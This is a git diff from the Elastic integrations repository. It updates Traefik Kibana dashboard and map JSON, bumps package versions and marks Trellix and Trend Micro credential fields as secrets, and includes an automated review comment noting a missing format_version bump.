"71cbfad3-6ff2-4f28-9020-3bfe22ff57ae": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.version: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "6d5f8062-c79c-486c-9794-6573d150079e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.version" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "4197aa5d-acaf-4763-b484-11eb2549236f", + "layerType": "data", + "legendDisplay": "show", + "legendPosition": "bottom", + "nestedLegend": false, + 
"numberDisplay": "percent", + "legendSize": "auto", + "primaryGroups": [ + "2a765fd5-0372-4b9d-905f-f4b4f26a6447", + "71cbfad3-6ff2-4f28-9020-3bfe22ff57ae" + ], + "metrics": [ + "6d5f8062-c79c-486c-9794-6573d150079e" + ] + } + ], + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "panelIndex": "d299d213-6e63-485b-9c58-61209d984bce", - "title": "Browsers breakdown [Logs Traefik]", - "type": "lens", - "version": "8.0.0" + "shape": "donut" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-38d38e12-d8c2-41a2-944b-f543271336df", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "38d38e12-d8c2-41a2-944b-f543271336df": { - "columnOrder": [ - "3bb8db2c-ba41-4927-8679-d0cd1fbfcf36", - "27deb44a-1572-43a0-9db2-34e312e891a3", - "97ebb05c-0b6e-4828-aff7-154fd2726900" - ], - "columns": { - "27deb44a-1572-43a0-9db2-34e312e891a3": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.os.version: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "97ebb05c-0b6e-4828-aff7-154fd2726900", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.os.version" - }, - "3bb8db2c-ba41-4927-8679-d0cd1fbfcf36": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "user_agent.os.name: Descending", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "97ebb05c-0b6e-4828-aff7-154fd2726900", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "user_agent.os.name" - }, - 
"97ebb05c-0b6e-4828-aff7-154fd2726900": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "scale": "ratio", - "sourceField": "Records" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "type": "lens" + }, + "title": "Browsers breakdown [Logs Traefik]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 16, + "i": "2386dd27-15d0-42ac-85f2-406febb6d3b1", + "w": 16, + "x": 16, + "y": 39 + }, + "panelIndex": "2386dd27-15d0-42ac-85f2-406febb6d3b1", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-38d38e12-d8c2-41a2-944b-f543271336df", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "38d38e12-d8c2-41a2-944b-f543271336df": { + "columnOrder": [ + "3bb8db2c-ba41-4927-8679-d0cd1fbfcf36", + "27deb44a-1572-43a0-9db2-34e312e891a3", + "97ebb05c-0b6e-4828-aff7-154fd2726900" + ], + "columns": { + "27deb44a-1572-43a0-9db2-34e312e891a3": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.os.version: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "97ebb05c-0b6e-4828-aff7-154fd2726900", + "type": "column" }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.os.version" + }, + "3bb8db2c-ba41-4927-8679-d0cd1fbfcf36": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "user_agent.os.name: Descending", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": 
"97ebb05c-0b6e-4828-aff7-154fd2726900", + "type": "column" }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "groups": [ - "3bb8db2c-ba41-4927-8679-d0cd1fbfcf36", - "27deb44a-1572-43a0-9db2-34e312e891a3" - ], - "layerId": "38d38e12-d8c2-41a2-944b-f543271336df", - "layerType": "data", - "legendDisplay": "show", - "legendPosition": "bottom", - "metric": "97ebb05c-0b6e-4828-aff7-154fd2726900", - "nestedLegend": false, - "numberDisplay": "percent" - } - ], - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "shape": "donut" - } + "orderDirection": "desc", + "otherBucket": false, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "user_agent.os.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" - }, - "enhancements": {} - }, - "gridData": { - "h": 16, - "i": "2386dd27-15d0-42ac-85f2-406febb6d3b1", - "w": 16, - "x": 16, - "y": 39 + "97ebb05c-0b6e-4828-aff7-154fd2726900": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "38d38e12-d8c2-41a2-944b-f543271336df", + "layerType": "data", + "legendDisplay": "show", + "legendPosition": "bottom", + "nestedLegend": false, + "numberDisplay": "percent", + "legendSize": "auto", + "primaryGroups": [ + "3bb8db2c-ba41-4927-8679-d0cd1fbfcf36", + "27deb44a-1572-43a0-9db2-34e312e891a3" + ], + "metrics": [ + "97ebb05c-0b6e-4828-aff7-154fd2726900" + ] + } + ], + "palette": { + "name": "kibana_palette", + "type": "palette" }, - "panelIndex": "2386dd27-15d0-42ac-85f2-406febb6d3b1", - "title": "Operating systems breakdown [Logs Traefik]", - "type": "lens", - "version": "8.0.0" + "shape": "donut" + } }, - { - "embeddableConfig": { - "attributes": { - 
"references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-7042a118-2f13-41fb-b0e6-192c1233689d", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-0b13f4d2-11cd-47b5-8128-7dcb60514861", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "0b13f4d2-11cd-47b5-8128-7dcb60514861": { - "columnOrder": [ - "df0a2fac-79a4-4354-a468-b9a6992e9335", - "092db128-4fe0-463d-aee6-871ea4032f18" - ], - "columns": { - "092db128-4fe0-463d-aee6-871ea4032f18": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Count", - "operationType": "count", - "scale": "ratio", - "sourceField": "Records" - }, - "df0a2fac-79a4-4354-a468-b9a6992e9335": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - }, - "7042a118-2f13-41fb-b0e6-192c1233689d": { - "columnOrder": [ - "bca2786a-0632-4fcb-bddf-6d0a9259844f", - "f4e8ed07-3254-4ec6-b80d-8568d9ea7018" - ], - "columns": { - "bca2786a-0632-4fcb-bddf-6d0a9259844f": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "f4e8ed07-3254-4ec6-b80d-8568d9ea7018": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Data sent", - "operationType": "sum", - "scale": "ratio", - "sourceField": "http.response.body.bytes" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "data_stream.dataset:traefik.access" - }, - "visualization": { - "fittingFunction": "Linear", - "layers": [ - 
{ - "accessors": [ - "f4e8ed07-3254-4ec6-b80d-8568d9ea7018" - ], - "layerId": "7042a118-2f13-41fb-b0e6-192c1233689d", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "xAccessor": "bca2786a-0632-4fcb-bddf-6d0a9259844f" - }, - { - "accessors": [ - "092db128-4fe0-463d-aee6-871ea4032f18" - ], - "layerId": "0b13f4d2-11cd-47b5-8128-7dcb60514861", - "layerType": "data", - "seriesType": "line", - "xAccessor": "df0a2fac-79a4-4354-a468-b9a6992e9335", - "yConfig": [ - { - "axisMode": "right", - "color": "#d6bf57", - "forAccessor": "092db128-4fe0-463d-aee6-871ea4032f18" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right" - }, - "preferredSeriesType": "line", - "title": "Empty XY chart", - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "type": "lens" + }, + "title": "Operating systems breakdown [Logs Traefik]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 16, + "i": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d", + "w": 16, + "x": 32, + "y": 39 + }, + "panelIndex": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-7042a118-2f13-41fb-b0e6-192c1233689d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-0b13f4d2-11cd-47b5-8128-7dcb60514861", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "0b13f4d2-11cd-47b5-8128-7dcb60514861": { + "columnOrder": [ + "df0a2fac-79a4-4354-a468-b9a6992e9335", + "092db128-4fe0-463d-aee6-871ea4032f18" + ], + "columns": { + "092db128-4fe0-463d-aee6-871ea4032f18": { + "customLabel": true, + 
"dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "df0a2fac-79a4-4354-a468-b9a6992e9335": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "interval": "auto", + "includeEmptyRows": true + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} }, - "enhancements": {} + "7042a118-2f13-41fb-b0e6-192c1233689d": { + "columnOrder": [ + "bca2786a-0632-4fcb-bddf-6d0a9259844f", + "f4e8ed07-3254-4ec6-b80d-8568d9ea7018" + ], + "columns": { + "bca2786a-0632-4fcb-bddf-6d0a9259844f": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "interval": "auto", + "includeEmptyRows": true + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "f4e8ed07-3254-4ec6-b80d-8568d9ea7018": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Data sent", + "operationType": "sum", + "scale": "ratio", + "sourceField": "http.response.body.bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "data_stream.dataset:traefik.access" + }, + "visualization": { + "fittingFunction": "Linear", + "layers": [ + { + "accessors": [ + "f4e8ed07-3254-4ec6-b80d-8568d9ea7018" + ], + "layerId": "7042a118-2f13-41fb-b0e6-192c1233689d", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "bca2786a-0632-4fcb-bddf-6d0a9259844f" + }, + { + "accessors": [ + "092db128-4fe0-463d-aee6-871ea4032f18" + ], + "layerId": "0b13f4d2-11cd-47b5-8128-7dcb60514861", + "layerType": "data", + "seriesType": "line", + "xAccessor": "df0a2fac-79a4-4354-a468-b9a6992e9335", + "yConfig": [ + { + "axisMode": "right", + "color": "#d6bf57", + 
"forAccessor": "092db128-4fe0-463d-aee6-871ea4032f18" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right", + "legendSize": "auto" }, - "gridData": { - "h": 16, - "i": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d", - "w": 16, - "x": 32, - "y": 39 + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d", - "title": "Sent Byte Size [Logs Traefik]", - "type": "lens", - "version": "8.0.0" - } - ], - "timeRestore": false, - "title": "[Logs Traefik] Access logs", - "version": 1 - }, - "coreMigrationVersion": "8.0.0", - "id": "traefik-Logs-Traefik-Dashboard", - "migrationVersion": { - "dashboard": "8.0.0" - }, - "references": [ - { - "id": "traefik-71eaad00-e257-11ec-baf0-970634a1784d", - "name": "121accaa-e45e-414b-b9a3-f73fba06cf83:panel_121accaa-e45e-414b-b9a3-f73fba06cf83", - "type": "map" - }, - { - "id": "logs-*", - "name": "2efa927c-4fd1-4073-9b78-8ef6ec27200d:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "2efa927c-4fd1-4073-9b78-8ef6ec27200d:indexpattern-datasource-layer-2b18aa0a-3889-45f0-9aa1-3ba3510050c3", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "b22d8a5b-a46f-4763-a884-e0032620fb37:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "b22d8a5b-a46f-4763-a884-e0032620fb37:indexpattern-datasource-layer-ef238d74-b1e4-43f4-a941-8ffd25108069", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "d299d213-6e63-485b-9c58-61209d984bce:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "d299d213-6e63-485b-9c58-61209d984bce:indexpattern-datasource-layer-4197aa5d-acaf-4763-b484-11eb2549236f", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": 
"2386dd27-15d0-42ac-85f2-406febb6d3b1:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "2386dd27-15d0-42ac-85f2-406febb6d3b1:indexpattern-datasource-layer-38d38e12-d8c2-41a2-944b-f543271336df", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d:indexpattern-datasource-layer-7042a118-2f13-41fb-b0e6-192c1233689d", - "type": "index-pattern" + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "type": "lens" }, - { - "id": "logs-*", - "name": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d:indexpattern-datasource-layer-0b13f4d2-11cd-47b5-8128-7dcb60514861", - "type": "index-pattern" - } + "title": "Sent Byte Size [Logs Traefik]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Logs Traefik] Access logs", + "version": 1 + }, + "references": [ + { + "id": "logs-*", + "name": "2efa927c-4fd1-4073-9b78-8ef6ec27200d:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2efa927c-4fd1-4073-9b78-8ef6ec27200d:indexpattern-datasource-layer-2b18aa0a-3889-45f0-9aa1-3ba3510050c3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b22d8a5b-a46f-4763-a884-e0032620fb37:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b22d8a5b-a46f-4763-a884-e0032620fb37:indexpattern-datasource-layer-ef238d74-b1e4-43f4-a941-8ffd25108069", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d299d213-6e63-485b-9c58-61209d984bce:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"d299d213-6e63-485b-9c58-61209d984bce:indexpattern-datasource-layer-4197aa5d-acaf-4763-b484-11eb2549236f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2386dd27-15d0-42ac-85f2-406febb6d3b1:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2386dd27-15d0-42ac-85f2-406febb6d3b1:indexpattern-datasource-layer-38d38e12-d8c2-41a2-944b-f543271336df", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d:indexpattern-datasource-layer-7042a118-2f13-41fb-b0e6-192c1233689d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5ca3d02c-d713-41c9-abe8-a9c4a1f97c3d:indexpattern-datasource-layer-0b13f4d2-11cd-47b5-8128-7dcb60514861", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "121accaa-e45e-414b-b9a3-f73fba06cf83:layer_1_source_index_pattern", + "id": "logs-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/traefik/kibana/map/traefik-71eaad00-e257-11ec-baf0-970634a1784d.json b/packages/traefik/kibana/map/traefik-71eaad00-e257-11ec-baf0-970634a1784d.json deleted file mode 100644 index a77df82af58..00000000000 --- a/packages/traefik/kibana/map/traefik-71eaad00-e257-11ec-baf0-970634a1784d.json +++ /dev/null 
@@ -1,211 +0,0 @@ -{ - "attributes": { - "description": "", - "layerListJSON": [ - { - "alpha": 1, - "id": "cccbea23-8692-421c-80e4-0f33e025c810", - "includeInFitToBounds": true, - "label": null, - "maxZoom": 24, - "minZoom": 0, - "sourceDescriptor": { - "isAutoSelect": true, - "lightModeDefault": "road_map_desaturated", - "type": "EMS_TMS" - }, - "style": { - "type": "TILE" - }, - "type": "VECTOR_TILE", - "visible": true - }, - { - "alpha": 0.75, - "id": "151240fd-cdc3-41d3-aaf8-21af553ecb69", - "includeInFitToBounds": true, - "joins": [], - "label": "Access Map [Logs Traefik]", - "maxZoom": 24, - "minZoom": 0, - "sourceDescriptor": { - "applyForceRefresh": true, - "applyGlobalQuery": true, - "applyGlobalTime": true, - "geoField": "source.geo.location", - "id": "a8ada758-9bca-4cde-93b2-a62db261663d", - "indexPatternRefName": "layer_1_source_index_pattern", - "metrics": [ - { - "type": "count" - } - ], - "requestType": "point", - "resolution": "MOST_FINE", - "type": "ES_GEO_GRID" - }, - "style": { - "isTimeAware": true, - "properties": { - "fillColor": { - "options": { - "color": "Yellow to Red", - "colorCategory": "palette_0", - "field": { - "name": "doc_count", - "origin": "source" - }, - "fieldMetaOptions": { - "isEnabled": false, - "sigma": 3 - }, - "type": "ORDINAL" - }, - "type": "DYNAMIC" - }, - "icon": { - "options": { - "value": "marker" - }, - "type": "STATIC" - }, - "iconOrientation": { - "options": { - "orientation": 0 - }, - "type": "STATIC" - }, - "iconSize": { - "options": { - "field": { - "name": "doc_count", - "origin": "source" - }, - "fieldMetaOptions": { - "isEnabled": false, - "sigma": 3 - }, - "maxSize": 18, - "minSize": 7 - }, - "type": "DYNAMIC" - }, - "labelBorderColor": { - "options": { - "color": "#FFFFFF" - }, - "type": "STATIC" - }, - "labelBorderSize": { - "options": { - "size": "SMALL" - } - }, - "labelColor": { - "options": { - "color": "#000000" - }, - "type": "STATIC" - }, - "labelSize": { - "options": { - "size": 14 - }, - "type": 
"STATIC" - }, - "labelText": { - "options": { - "value": "" - }, - "type": "STATIC" - }, - "lineColor": { - "options": { - "color": "#3d3d3d" - }, - "type": "STATIC" - }, - "lineWidth": { - "options": { - "size": 1 - }, - "type": "STATIC" - }, - "symbolizeAs": { - "options": { - "value": "circle" - } - } - }, - "type": "VECTOR" - }, - "type": "VECTOR", - "visible": true - } - ], - "mapStateJSON": { - "center": { - "lat": 19.94277, - "lon": 0 - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "refreshConfig": { - "interval": 0, - "isPaused": true - }, - "settings": { - "autoFitToDataBounds": false, - "backgroundColor": "#ffffff", - "browserLocation": { - "zoom": 2 - }, - "disableInteractive": false, - "disableTooltipControl": false, - "fixedLocation": { - "lat": 0, - "lon": 0, - "zoom": 2 - }, - "hideLayerControl": false, - "hideToolbarOverlay": false, - "hideViewControl": false, - "initialLocation": "LAST_SAVED_LOCATION", - "maxZoom": 24, - "minZoom": 0, - "showScaleControl": false, - "showSpatialFilters": true, - "showTimesliderToggleButton": true, - "spatialFiltersAlpa": 0.3, - "spatialFiltersFillColor": "#DA8B45", - "spatialFiltersLineColor": "#DA8B45" - }, - "timeFilters": { - "from": "now-15m", - "to": "now" - }, - "zoom": 2.11 - }, - "title": "Traefik logs [Logs Traefik]", - "uiStateJSON": { - "isLayerTOCOpen": true, - "openTOCDetails": [] - } - }, - "coreMigrationVersion": "8.0.0", - "id": "traefik-71eaad00-e257-11ec-baf0-970634a1784d", - "migrationVersion": { - "map": "8.0.0" - }, - "references": [ - { - "id": "logs-*", - "name": "layer_1_source_index_pattern", - "type": "index-pattern" - } - ], - "type": "map" -} \ No newline at end of file diff --git a/packages/traefik/manifest.yml b/packages/traefik/manifest.yml index 84d48bec909..6403b941cee 100644 --- a/packages/traefik/manifest.yml +++ b/packages/traefik/manifest.yml 
@@ -1,6 +1,6 @@ name: traefik title: Traefik -version: "1.11.0" +version: "1.11.1" description: Collect logs and metrics from Traefik servers with Elastic Agent. type: integration icons: diff --git a/packages/trellix_edr_cloud/changelog.yml b/packages/trellix_edr_cloud/changelog.yml index cea2218380a..b883c99f3ba 100644 --- a/packages/trellix_edr_cloud/changelog.yml +++ b/packages/trellix_edr_cloud/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/trellix_edr_cloud/manifest.yml b/packages/trellix_edr_cloud/manifest.yml index c5606219650..181b095988d 100644 --- a/packages/trellix_edr_cloud/manifest.yml +++ b/packages/trellix_edr_cloud/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: trellix_edr_cloud title: Trellix EDR Cloud -version: "1.0.1" +version: "1.1.0" description: Collect logs from Trellix EDR Cloud with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - security conditions: kibana: - version: ^8.9.0 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -60,6 +60,7 @@ policy_templates: required: false show_user: true description: First part of access key. This parameter along with the secret_access_key parameter is required if we are not providing shared_credential_file. + secret: true - name: secret_access_key type: password title: Secret Access Key @@ -67,6 +68,7 @@ policy_templates: required: false show_user: true description: Second part of access key. This parameter along with the access_key_id parameter is required if we are not providing shared_credential_file. + secret: true - name: region type: text title: "[SQS] Region" 
@@ -75,12 +77,13 @@ policy_templates: show_user: true description: The name of the AWS region of the end point. If this option is given it takes precedence over the region name obtained from the queue_url value. - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true description: Required when using temporary security credentials. + secret: true - name: shared_credential_file type: text title: Shared Credential File diff --git a/packages/trellix_epo_cloud/changelog.yml b/packages/trellix_epo_cloud/changelog.yml index 4ed1151140e..c5ab2775d1c 100644 --- a/packages/trellix_epo_cloud/changelog.yml +++ b/packages/trellix_epo_cloud/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.10.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.9.1" changes: - description: Changed owners diff --git a/packages/trellix_epo_cloud/manifest.yml b/packages/trellix_epo_cloud/manifest.yml index 73133e0cc37..0124cb44a98 100644 --- a/packages/trellix_epo_cloud/manifest.yml +++ b/packages/trellix_epo_cloud/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: trellix_epo_cloud title: Trellix ePO Cloud -version: "1.9.1" +version: "1.10.0" source: license: Elastic-2.0 description: Collect logs from Trellix ePO Cloud with Elastic Agent. @@ -10,7 +10,7 @@ categories: - security conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 elastic: subscription: basic screenshots: @@ -54,6 +54,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: api_key type: password title: API Key @@ -61,6 +62,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: url type: text title: URL 
@@ -75,6 +77,7 @@ policy_templates: default: https://iam.mcafee-cloud.com/iam/v1.1/token required: true show_user: false + secret: false - name: proxy_url type: text title: Proxy URL diff --git a/packages/trend_micro_vision_one/changelog.yml b/packages/trend_micro_vision_one/changelog.yml index ddc31b379fa..c0fa8edb2fb 100644 --- a/packages/trend_micro_vision_one/changelog.yml +++ b/packages/trend_micro_vision_one/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.16.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.15.1" changes: - description: Changed owners diff --git a/packages/trend_micro_vision_one/manifest.yml b/packages/trend_micro_vision_one/manifest.yml index 1047355cbad..29cb5f07f9b 100644 --- a/packages/trend_micro_vision_one/manifest.yml +++ b/packages/trend_micro_vision_one/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: trend_micro_vision_one title: Trend Micro Vision One -version: "1.15.1" +version: "1.16.0" description: Collect logs from Trend Micro Vision One with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - edr_xdr conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/trend-micro-vision-one-alert-dashboard-screenshot.png title: Trend Micro Vision One Dashboard Screenshot @@ -46,6 +46,7 @@ policy_templates: title: API Token description: API Token with API Access Level type. required: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/trendmicro/_dev/build/build.yml b/packages/trendmicro/_dev/build/build.yml index 2bfcfc223b0..71f48ba2a9c 100644 --- a/packages/trendmicro/_dev/build/build.yml +++ b/packages/trendmicro/_dev/build/build.yml @@ -1,3 +1,4 @@ dependencies: ecs: reference: "git@v8.11.0" + import_mappings: true 
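Review bot: The `secret: true` added under the API Token variable in `packages/trend_micro_vision_one/manifest.yml` is not paired with a `format_version` bump — the first hunk of that file leaves `format_version: "3.0.0"` untouched, while the trellix_edr_cloud and trellix_epo_cloud manifests in this same change move to `3.0.2` alongside identical `secret: true` additions. If the `secret` variable property is only defined from a later spec version (which those other bumps suggest), this manifest would either fail package validation or be accepted without actually protecting the token; confirm against the package-spec changelog and, if needed, change the first line to `format_version: "3.0.2"`. The variable's `type` is outside the hunk, so I cannot tell whether it is `password`; it should be, so the token is masked in the UI as well as stored as a secret.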
diff --git a/packages/trendmicro/_dev/build/docs/README.md b/packages/trendmicro/_dev/build/docs/README.md index ca546c7d55a..931a4c77468 100644 --- a/packages/trendmicro/_dev/build/docs/README.md +++ b/packages/trendmicro/_dev/build/docs/README.md 
@@ -2,15 +2,50 @@ ## Overview -Trend Micro Deep Security provides advanced server security for physical, virtual, and cloud servers. It protects enterprise applications and data from breaches and business disruptions without requiring emergency patching. The Trend Micro Deep Security integration collects and parses data received from [Deep Security](https://www.trendmicro.com/en_gb/business/products/hybrid-cloud/deep-security.html) via a log file. +Trend Micro Deep Security provides advanced server security for physical, virtual, and cloud servers. It protects enterprise applications and data from breaches and business disruptions without requiring emergency patching. The Trend Micro Deep Security integration collects and parses data received from [Deep Security](https://www.trendmicro.com/en_gb/business/products/hybrid-cloud/deep-security.html) via syslog server. ## Data Streams -This integration collects **deep_security** data streams.See more details from Deep Security logging documentation [here](https://help.deepsecurity.trendmicro.com/aws/events.html). +This integration supports **deep_security** data stream. See more details from Deep Security logging documentation [here](https://help.deepsecurity.trendmicro.com/20_0/on-premise/events.html). ## Requirements -Elastic Agent is required to ingest data from Deep Security log files. This integration has been tested against Deep Security v12 LTS. Please note is you have a Trend Micro Vision One XDR license, we recommend using the [Vision One](https://docs.elastic.co/integrations/trend_micro_vision_one) integration to ingest Deep Security events. For steps on how to configure Deep Security events with Vision One, please see [here](https://help.deepsecurity.trendmicro.com/aws/xdr.html). +Elastic Agent is required to ingest data from Deep Security. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). 
